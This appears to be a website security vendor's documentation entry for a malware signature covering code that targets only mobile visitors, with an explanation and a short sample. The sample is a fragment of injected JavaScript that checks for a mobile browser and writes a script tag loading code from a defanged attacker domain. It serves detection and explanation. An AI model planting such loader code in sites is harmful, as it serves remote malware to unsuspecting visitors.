SiteCheck Signatures

  1. Home
  2. Docs
  3. SiteCheck Signatures

Detected malicious code that targets only visitors that use mobile devices. Typically malware checks either User-Agent header or screen dimensions to determine whether a mobile browser is used.

Malware that targets mobile users may use rewrite rules in .htaccess files, server-side scripts (e.g. PHP, ASP, etc) or client-side script (e.g. JavaScript).

Example of JavaScript based mobile malware

function isMobile() {

var a = (navigator.userAgent|​|navigator.vendor|​|window.opera);
    return true;

return false;

if(isMobile() === true) {document .write('<script type="text/javascript" src="hxxp://tizermedias[.]com/odessa/​?H6rRyf"></script>');

Affecting: Any web site (no specific target).